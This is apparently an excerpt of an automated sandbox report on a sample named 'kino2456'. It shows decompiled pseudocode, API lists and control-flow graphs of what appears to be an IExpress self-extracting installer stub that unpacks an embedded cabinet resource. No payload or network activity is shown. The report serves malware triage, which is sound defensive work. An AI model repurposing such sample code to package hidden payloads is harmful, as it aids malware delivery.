                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009656e1
                                                                                                                                                                                                                                    0x009656e2
                                                                                                                                                                                                                                    0x009656e4
                                                                                                                                                                                                                                    0x009656e6
                                                                                                                                                                                                                                    0x009656eb
                                                                                                                                                                                                                                    0x009656ed
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009656f3
                                                                                                                                                                                                                                    0x009656f3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096586c
                                                                                                                                                                                                                                    0x00965878
                                                                                                                                                                                                                                    0x0096587e
                                                                                                                                                                                                                                    0x00965882
                                                                                                                                                                                                                                    0x00965883
                                                                                                                                                                                                                                    0x00965889
                                                                                                                                                                                                                                    0x0096588e
                                                                                                                                                                                                                                    0x0096588e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965896
                                                                                                                                                                                                                                    0x009656ed
                                                                                                                                                                                                                                    0x009656df
                                                                                                                                                                                                                                    0x009656d0
                                                                                                                                                                                                                                    0x009656c1
                                                                                                                                                                                                                                    0x009656a8
                                                                                                                                                                                                                                    0x0096565b
                                                                                                                                                                                                                                    0x0096565b
                                                                                                                                                                                                                                    0x0096565d
                                                                                                                                                                                                                                    0x00965669
                                                                                                                                                                                                                                    0x00965669
                                                                                                                                                                                                                                    0x0096565f
                                                                                                                                                                                                                                    0x0096565f
                                                                                                                                                                                                                                    0x00965665
                                                                                                                                                                                                                                    0x00965667
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965667
                                                                                                                                                                                                                                    0x0096566c
                                                                                                                                                                                                                                    0x00965673
                                                                                                                                                                                                                                    0x00965678
                                                                                                                                                                                                                                    0x0096567a
                                                                                                                                                                                                                                    0x0096589b
                                                                                                                                                                                                                                    0x0096589b
                                                                                                                                                                                                                                    0x00965680
                                                                                                                                                                                                                                    0x00965685
                                                                                                                                                                                                                                    0x0096568c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096568c
                                                                                                                                                                                                                                    0x0096567a
                                                                                                                                                                                                                                    0x0096560e
                                                                                                                                                                                                                                    0x00965613
                                                                                                                                                                                                                                    0x0096561a
                                                                                                                                                                                                                                    0x00965620
                                                                                                                                                                                                                                    0x00965626
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965626
                                                                                                                                                                                                                                    0x009655db
                                                                                                                                                                                                                                    0x009655e0
                                                                                                                                                                                                                                    0x009655e7
                                                                                                                                                                                                                                    0x009655f1
                                                                                                                                                                                                                                    0x009655f6
                                                                                                                                                                                                                                    0x009655f6
                                                                                                                                                                                                                                    0x009655f6
                                                                                                                                                                                                                                    0x009658b7
                                                                                                                                                                                                                                    0x009658c7

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009646A0
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: SizeofResource.KERNEL32(00000000,00000000,?,00962D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009646A9
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009646C3
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: LoadResource.KERNEL32(00000000,00000000,?,00962D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009646CC
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: LockResource.KERNEL32(00000000,?,00962D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009646D3
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: memcpy_s.MSVCRT ref: 009646E5
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009646EF
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 009655CF
                                                                                                                                                                                                                                    • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00965638
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 0096564C
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00965620
                                                                                                                                                                                                                                      • Part of subcall function 009644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00964518
                                                                                                                                                                                                                                      • Part of subcall function 009644B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00964554
                                                                                                                                                                                                                                      • Part of subcall function 00966285: GetLastError.KERNEL32(00965BBC), ref: 00966285
                                                                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 009656B9
                                                                                                                                                                                                                                    • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 0096571E
                                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00965737
                                                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 009657CD
                                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 009657EF
                                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00965802
                                                                                                                                                                                                                                      • Part of subcall function 00962630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00962654
                                                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00965830
                                                                                                                                                                                                                                      • Part of subcall function 00966517: FindResourceA.KERNEL32(00960000,000007D6,00000005), ref: 0096652A
                                                                                                                                                                                                                                      • Part of subcall function 00966517: LoadResource.KERNEL32(00960000,00000000,?,?,00962EE8,00000000,009619E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00966538
                                                                                                                                                                                                                                      • Part of subcall function 00966517: DialogBoxIndirectParamA.USER32(00960000,00000000,00000547,009619E0,00000000), ref: 00966557
                                                                                                                                                                                                                                      • Part of subcall function 00966517: FreeResource.KERNEL32(00000000,?,?,00962EE8,00000000,009619E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00966560
                                                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00965878
                                                                                                                                                                                                                                      • Part of subcall function 0096597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 009659A8
                                                                                                                                                                                                                                      • Part of subcall function 0096597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 009659AF
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                                                    • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                                                    • API String ID: 2436801531-3708386018
                                                                                                                                                                                                                                    • Opcode ID: 545dab727a3fc8c237c380084f1b14710aede498e5b01a152b31486624855518
                                                                                                                                                                                                                                    • Instruction ID: 9b3556ff06f8e1b43608a307394e1e3aae1ef90250ffcb2b6291d0f5c638c913
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 545dab727a3fc8c237c380084f1b14710aede498e5b01a152b31486624855518
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F1814B70A08A049BDB20AB74CD95BFE72AD9FA1300F4500AAF586E3191DFB48DC1CE51
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 0096597D Relevance: 19.7, APIs: 13, Instructions: 212windowCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 324 96597d-9659b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 9659dd-965a1b GetDiskFreeSpaceA 324->325 326 9659bb-9659d8 call 9644b9 call 966285 324->326 328 965ba1-965bde memset call 966285 GetLastError FormatMessageA 325->328 329 965a21-965a4a MulDiv 325->329 341 965c05-965c14 call 966ce0 326->341 338 965be3-965bfc call 9644b9 SetCurrentDirectoryA 328->338 329->328 332 965a50-965a6c GetVolumeInformationA 329->332 335 965ab5-965aca SetCurrentDirectoryA 332->335 336 965a6e-965ab0 memset call 966285 GetLastError FormatMessageA 332->336 340 965acc-965ad1 335->340 336->338 353 965c02 338->353 344 965ae2-965ae4 340->344 345 965ad3-965ad8 340->345 346 965ae6 344->346 347 965ae7-965af8 344->347 345->344 349 965ada-965ae0 345->349 346->347 352 965af9-965afb 347->352 349->340 349->344 354 965b05-965b08 352->354 355 965afd-965b03 352->355 356 965c04 353->356 357 965b20-965b27 354->357 358 965b0a-965b1b call 9644b9 354->358 355->352 355->354 356->341 360 965b52-965b5b 357->360 361 965b29-965b33 357->361 358->353 364 965b62-965b6d 360->364 361->360 363 965b35-965b50 361->363 363->364 365 965b76-965b7d 364->365 366 965b6f-965b74 364->366 368 965b83 365->368 369 965b7f-965b81 365->369 367 965b85 366->367 370 965b96-965b9f 367->370 371 965b87-965b94 call 96268b 367->371 368->367 369->367 370->356 371->356
                                                                                                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                                                                                                    			E0096597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
				signed int _v8;
				char _v16;
				char _v276;
				char _v788;
				long _v792;
				long _v796;
				long _v800;
				signed int _v804;
				long _v808;
				int _v812;
				long _v816;
				long _v820;
				void* __ebx;
				void* __esi;
				signed int _t46;
				int _t50;
				signed int _t55;
				void* _t66;
				int _t69;
				signed int _t73;
				signed short _t78;
				signed int _t87;
				signed int _t101;
				int _t102;
				unsigned int _t103;
				unsigned int _t105;
				signed int _t111;
				long _t112;
				signed int _t116;
				CHAR* _t118;
				signed int _t119;
				signed int _t120;

				_t114 = __edi;
				_t46 =  *0x968004; // 0xf4cc89a0
				_v8 = _t46 ^ _t120;
				_v804 = __edx;
				_t118 = __ecx;
				GetCurrentDirectoryA(0x104,  &_v276);
				_t50 = SetCurrentDirectoryA(_t118); // executed
				if(_t50 != 0) {
					_push(__edi);
					_v796 = 0;
					_v792 = 0;
					_v800 = 0;
					_v808 = 0;
					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
					__eflags = _t55;
					if(_t55 == 0) {
						L29:
						memset( &_v788, 0, 0x200);
						 *0x969124 = E00966285();
						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
						_t110 = 0x4b0;
						L30:
						__eflags = 0;
						E009644B9(0, _t110, _t118,  &_v788, 0x10, 0);
						SetCurrentDirectoryA( &_v276);
						L31:
						_t66 = 0;
						__eflags = 0;
						L32:
						_pop(_t114);
						goto L33;
					}
					_t69 = _v792 * _v796;
					_v812 = _t69;
					_t116 = MulDiv(_t69, _v800, 0x400);
					__eflags = _t116;
					if(_t116 == 0) {
						goto L29;
					}
					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
					__eflags = _t73;
					if(_t73 != 0) {
						SetCurrentDirectoryA( &_v276); // executed
						_t101 =  &_v16;
						_t111 = 6;
						_t119 = _t118 - _t101;
						__eflags = _t119;
						while(1) {
							_t22 = _t111 - 4; // 0x2
							__eflags = _t22;
							if(_t22 == 0) {
								break;
							}
							_t87 =  *((intOrPtr*)(_t119 + _t101));
							__eflags = _t87;
							if(_t87 == 0) {
								break;
							}
							 *_t101 = _t87;
							_t101 = _t101 + 1;
							_t111 = _t111 - 1;
							__eflags = _t111;
							if(_t111 != 0) {
								continue;
							}
							break;
						}
						__eflags = _t111;
						if(_t111 == 0) {
							_t101 = _t101 - 1;
							__eflags = _t101;
						}
						 *_t101 = 0;
						_t112 = 0x200;
						_t102 = _v812;
						_t78 = 0;
						_t118 = 8;
						while(1) {
							__eflags = _t102 - _t112;
							if(_t102 == _t112) {
								break;
							}
							_t112 = _t112 + _t112;
							_t78 = _t78 + 1;
							__eflags = _t78 - _t118;
							if(_t78 < _t118) {
								continue;
							}
							break;
						}
						__eflags = _t78 - _t118;
						if(_t78 != _t118) {
							__eflags =  *0x969a34 & 0x00000008;
							if(( *0x969a34 & 0x00000008) == 0) {
								L20:
								_t103 =  *0x969a38; // 0x0
								_t110 =  *((intOrPtr*)(0x9689e0 + (_t78 & 0x0000ffff) * 4));
								L21:
								__eflags = (_v804 & 0x00000003) - 3;
								if((_v804 & 0x00000003) != 3) {
									__eflags = _v804 & 0x00000001;
									if((_v804 & 0x00000001) == 0) {
										__eflags = _t103 - _t116;
									} else {
										__eflags = _t110 - _t116;
									}
								} else {
									__eflags = _t103 + _t110 - _t116;
								}
								if(__eflags <= 0) {
									 *0x969124 = 0;
									_t66 = 1;
								} else {
									_t66 = E0096268B(_a4, _t110, _t103,  &_v16);
								}
								goto L32;
							}
							__eflags = _v816 & 0x00008000;
							if((_v816 & 0x00008000) == 0) {
								goto L20;
							}
							_t105 =  *0x969a38; // 0x0
							_t110 =  *((intOrPtr*)(0x9689e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x9689e0 + (_t78 & 0x0000ffff) * 4));
							_t103 = (_t105 >> 2) +  *0x969a38;
							goto L21;
						}
						_t110 = 0x4c5;
						E009644B9(0, 0x4c5, 0, 0, 0x10, 0);
						goto L31;
					}
					memset( &_v788, 0, 0x200);
					 *0x969124 = E00966285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
					_t110 = 0x4f9;
					goto L30;
				} else {
					_t110 = 0x4bc;
					E009644B9(0, 0x4bc, 0, 0, 0x10, 0);
					 *0x969124 = E00966285();
					_t66 = 0;
					L33:
					return E00966CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
				}
			}



































                                                                                                                                                                                                                                    0x0096597d
                                                                                                                                                                                                                                    0x00965988
                                                                                                                                                                                                                                    0x0096598f
                                                                                                                                                                                                                                    0x0096599a
                                                                                                                                                                                                                                    0x009659a6
                                                                                                                                                                                                                                    0x009659a8
                                                                                                                                                                                                                                    0x009659af
                                                                                                                                                                                                                                    0x009659b9
                                                                                                                                                                                                                                    0x009659dd
                                                                                                                                                                                                                                    0x009659e4
                                                                                                                                                                                                                                    0x009659f1
                                                                                                                                                                                                                                    0x009659fe
                                                                                                                                                                                                                                    0x00965a0b
                                                                                                                                                                                                                                    0x00965a13
                                                                                                                                                                                                                                    0x00965a19
                                                                                                                                                                                                                                    0x00965a1b
                                                                                                                                                                                                                                    0x00965ba1
                                                                                                                                                                                                                                    0x00965baf
                                                                                                                                                                                                                                    0x00965bbd
                                                                                                                                                                                                                                    0x00965bd8
                                                                                                                                                                                                                                    0x00965bde
                                                                                                                                                                                                                                    0x00965be3
                                                                                                                                                                                                                                    0x00965bec
                                                                                                                                                                                                                                    0x00965bf0
                                                                                                                                                                                                                                    0x00965bfc
                                                                                                                                                                                                                                    0x00965c02
                                                                                                                                                                                                                                    0x00965c02
                                                                                                                                                                                                                                    0x00965c02
                                                                                                                                                                                                                                    0x00965c04
                                                                                                                                                                                                                                    0x00965c04
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965c04
                                                                                                                                                                                                                                    0x00965a27
                                                                                                                                                                                                                                    0x00965a3a
                                                                                                                                                                                                                                    0x00965a46
                                                                                                                                                                                                                                    0x00965a48
                                                                                                                                                                                                                                    0x00965a4a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965a64
                                                                                                                                                                                                                                    0x00965a6a
                                                                                                                                                                                                                                    0x00965a6c
                                                                                                                                                                                                                                    0x00965abc
                                                                                                                                                                                                                                    0x00965ac2
                                                                                                                                                                                                                                    0x00965ac9
                                                                                                                                                                                                                                    0x00965aca
                                                                                                                                                                                                                                    0x00965aca
                                                                                                                                                                                                                                    0x00965acc
                                                                                                                                                                                                                                    0x00965acc
                                                                                                                                                                                                                                    0x00965acf
                                                                                                                                                                                                                                    0x00965ad1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965ad3
                                                                                                                                                                                                                                    0x00965ad6
                                                                                                                                                                                                                                    0x00965ad8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965ada
                                                                                                                                                                                                                                    0x00965adc
                                                                                                                                                                                                                                    0x00965add
                                                                                                                                                                                                                                    0x00965add
                                                                                                                                                                                                                                    0x00965ae0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965ae0
                                                                                                                                                                                                                                    0x00965ae2
                                                                                                                                                                                                                                    0x00965ae4
                                                                                                                                                                                                                                    0x00965ae6
                                                                                                                                                                                                                                    0x00965ae6
                                                                                                                                                                                                                                    0x00965ae6
                                                                                                                                                                                                                                    0x00965ae9
                                                                                                                                                                                                                                    0x00965aeb
                                                                                                                                                                                                                                    0x00965af0
                                                                                                                                                                                                                                    0x00965af6
                                                                                                                                                                                                                                    0x00965af8
                                                                                                                                                                                                                                    0x00965af9
                                                                                                                                                                                                                                    0x00965af9
                                                                                                                                                                                                                                    0x00965afb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965afd
                                                                                                                                                                                                                                    0x00965aff
                                                                                                                                                                                                                                    0x00965b00
                                                                                                                                                                                                                                    0x00965b03
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965b03
                                                                                                                                                                                                                                    0x00965b05
                                                                                                                                                                                                                                    0x00965b08
                                                                                                                                                                                                                                    0x00965b20
                                                                                                                                                                                                                                    0x00965b27
                                                                                                                                                                                                                                    0x00965b52
                                                                                                                                                                                                                                    0x00965b52
                                                                                                                                                                                                                                    0x00965b5b
                                                                                                                                                                                                                                    0x00965b62
                                                                                                                                                                                                                                    0x00965b6b
                                                                                                                                                                                                                                    0x00965b6d
                                                                                                                                                                                                                                    0x00965b76
                                                                                                                                                                                                                                    0x00965b7d
                                                                                                                                                                                                                                    0x00965b83
                                                                                                                                                                                                                                    0x00965b7f
                                                                                                                                                                                                                                    0x00965b7f
                                                                                                                                                                                                                                    0x00965b7f
                                                                                                                                                                                                                                    0x00965b6f
                                                                                                                                                                                                                                    0x00965b72
                                                                                                                                                                                                                                    0x00965b72
                                                                                                                                                                                                                                    0x00965b85
                                                                                                                                                                                                                                    0x00965b98
                                                                                                                                                                                                                                    0x00965b9e
                                                                                                                                                                                                                                    0x00965b87
                                                                                                                                                                                                                                    0x00965b8f
                                                                                                                                                                                                                                    0x00965b8f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965b85
                                                                                                                                                                                                                                    0x00965b29
                                                                                                                                                                                                                                    0x00965b33
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965b35
                                                                                                                                                                                                                                    0x00965b48
                                                                                                                                                                                                                                    0x00965b4a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965b4a
                                                                                                                                                                                                                                    0x00965b0f
                                                                                                                                                                                                                                    0x00965b16
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965b16
                                                                                                                                                                                                                                    0x00965a7c
                                                                                                                                                                                                                                    0x00965a8a
                                                                                                                                                                                                                                    0x00965aa5
                                                                                                                                                                                                                                    0x00965aab
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009659bb
                                                                                                                                                                                                                                    0x009659c0
                                                                                                                                                                                                                                    0x009659c7
                                                                                                                                                                                                                                    0x009659d1
                                                                                                                                                                                                                                    0x009659d6
                                                                                                                                                                                                                                    0x00965c05
                                                                                                                                                                                                                                    0x00965c14
                                                                                                                                                                                                                                    0x00965c14

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 009659A8
                                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNELBASE(?), ref: 009659AF
                                                                                                                                                                                                                                    • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00965A13
                                                                                                                                                                                                                                    • MulDiv.KERNEL32(?,?,00000400), ref: 00965A40
                                                                                                                                                                                                                                    • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00965A64
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00965A7C
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00965A98
                                                                                                                                                                                                                                    • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00965AA5
                                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00965BFC
                                                                                                                                                                                                                                      • Part of subcall function 009644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00964518
                                                                                                                                                                                                                                      • Part of subcall function 009644B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00964554
                                                                                                                                                                                                                                      • Part of subcall function 00966285: GetLastError.KERNEL32(00965BBC), ref: 00966285
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 4237285672-0
                                                                                                                                                                                                                                    • Opcode ID: d5591081b6b5217434b24c51992bc7c30f4c474573d916c12e36f29a3861c3bf
                                                                                                                                                                                                                                    • Instruction ID: 4c44cdbd49a60ed6a9e66f6a7b4a45f21a9b65d7d4203164a7828085302ea9fd
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d5591081b6b5217434b24c51992bc7c30f4c474573d916c12e36f29a3861c3bf
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3671CEB191420CAFEB259F60CC85FFB77ACEB89344F5545AEF446E2140EA749E849F20
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00964FE0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 121windowCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 374 964fe0-96501a call 96468f FindResourceA LoadResource LockResource 377 965020-965027 374->377 378 965161-965163 374->378 379 965057-96505e call 964efd 377->379 380 965029-965051 GetDlgItem ShowWindow GetDlgItem ShowWindow 377->380 383 965060-965077 call 9644b9 379->383 384 96507c-9650b4 379->384 380->379 388 965107-96510e 383->388 389 9650b6-9650da 384->389 390 9650e8-965104 call 9644b9 384->390 392 965110-965117 FreeResource 388->392 393 96511d-96511f 388->393 398 965106 389->398 402 9650dc 389->402 390->398 392->393 395 965121-965127 393->395 396 96513a-965141 393->396 395->396 399 965129-965135 call 9644b9 395->399 400 965143-96514a 396->400 401 96515f 396->401 398->388 399->396 400->401 404 96514c-965159 SendMessageA 400->404 401->378 405 9650e3-9650e6 402->405 404->401 405->390 405->398
                                                                                                                                                                                                                                    C-Code - Quality: 77%
                                                                                                                                                                                                                                    			E00964FE0(void* __edi, void* __eflags) {
				void* __ebx;
				void* _t8;
				struct HWND__* _t9;
				int _t10;
				void* _t12;
				struct HWND__* _t24;
				struct HWND__* _t27;
				intOrPtr _t29;
				void* _t33;
				int _t34;
				CHAR* _t36;
				int _t37;
				intOrPtr _t47;

				_t33 = __edi;
				_t36 = "CABINET";
				 *0x969144 = E0096468F(_t36, 0, 0);
				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
				 *0x969140 = _t8;
				if(_t8 == 0) {
					return _t8;
				}
				_t9 =  *0x968584; // 0x0
				if(_t9 != 0) {
					ShowWindow(GetDlgItem(_t9, 0x842), 0);
					ShowWindow(GetDlgItem( *0x968584, 0x841), 5); // executed
				}
				_t10 = E00964EFD(0, 0); // executed
				if(_t10 != 0) {
					__imp__#20(E00964CA0, E00964CC0, E00964980, E00964A50, E00964AD0, E00964B60, E00964BC0, 1, 0x969148, _t33);
					_t34 = _t10;
					if(_t34 == 0) {
						L8:
						_t29 =  *0x969148; // 0x0
						_t24 =  *0x968584; // 0x0
						E009644B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
						_t37 = 0;
						L9:
						goto L10;
					}
					__imp__#22(_t34, "*MEMCAB", 0x961140, 0, E00964CD0, 0, 0x969140); // executed
					_t37 = _t10;
					if(_t37 == 0) {
						goto L9;
					}
					__imp__#23(_t34); // executed
					if(_t10 != 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t27 =  *0x968584; // 0x0
					E009644B9(_t27, 0x4ba, 0, 0, 0x10, 0);
					_t37 = 0;
					L10:
					_t12 =  *0x969140; // 0x0
					if(_t12 != 0) {
						FreeResource(_t12);
						 *0x969140 = 0;
					}
					if(_t37 == 0) {
						_t47 =  *0x9691d8; // 0x0
						if(_t47 == 0) {
							E009644B9(0, 0x4f8, 0, 0, 0x10, 0);
						}
					}
					if(( *0x968a38 & 0x00000001) == 0 && ( *0x969a34 & 0x00000001) == 0) {
						SendMessageA( *0x968584, 0xfa1, _t37, 0);
					}
					return _t37;
				}
			}
















                                                                                                                                                                                                                                    0x00964fe0
                                                                                                                                                                                                                                    0x00964fe6
                                                                                                                                                                                                                                    0x00964ff9
                                                                                                                                                                                                                                    0x0096500d
                                                                                                                                                                                                                                    0x00965013
                                                                                                                                                                                                                                    0x0096501a
                                                                                                                                                                                                                                    0x00965163
                                                                                                                                                                                                                                    0x00965163
                                                                                                                                                                                                                                    0x00965020
                                                                                                                                                                                                                                    0x00965027
                                                                                                                                                                                                                                    0x00965037
                                                                                                                                                                                                                                    0x00965051
                                                                                                                                                                                                                                    0x00965051
                                                                                                                                                                                                                                    0x00965057
                                                                                                                                                                                                                                    0x0096505e
                                                                                                                                                                                                                                    0x009650a7
                                                                                                                                                                                                                                    0x009650ad
                                                                                                                                                                                                                                    0x009650b4
                                                                                                                                                                                                                                    0x009650e8
                                                                                                                                                                                                                                    0x009650e8
                                                                                                                                                                                                                                    0x009650ee
                                                                                                                                                                                                                                    0x009650ff
                                                                                                                                                                                                                                    0x00965104
                                                                                                                                                                                                                                    0x00965106
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965106
                                                                                                                                                                                                                                    0x009650cd
                                                                                                                                                                                                                                    0x009650d3
                                                                                                                                                                                                                                    0x009650da
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009650dd
                                                                                                                                                                                                                                    0x009650e6
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965060
                                                                                                                                                                                                                                    0x00965060
                                                                                                                                                                                                                                    0x00965070
                                                                                                                                                                                                                                    0x00965075
                                                                                                                                                                                                                                    0x00965107
                                                                                                                                                                                                                                    0x00965107
                                                                                                                                                                                                                                    0x0096510e
                                                                                                                                                                                                                                    0x00965111
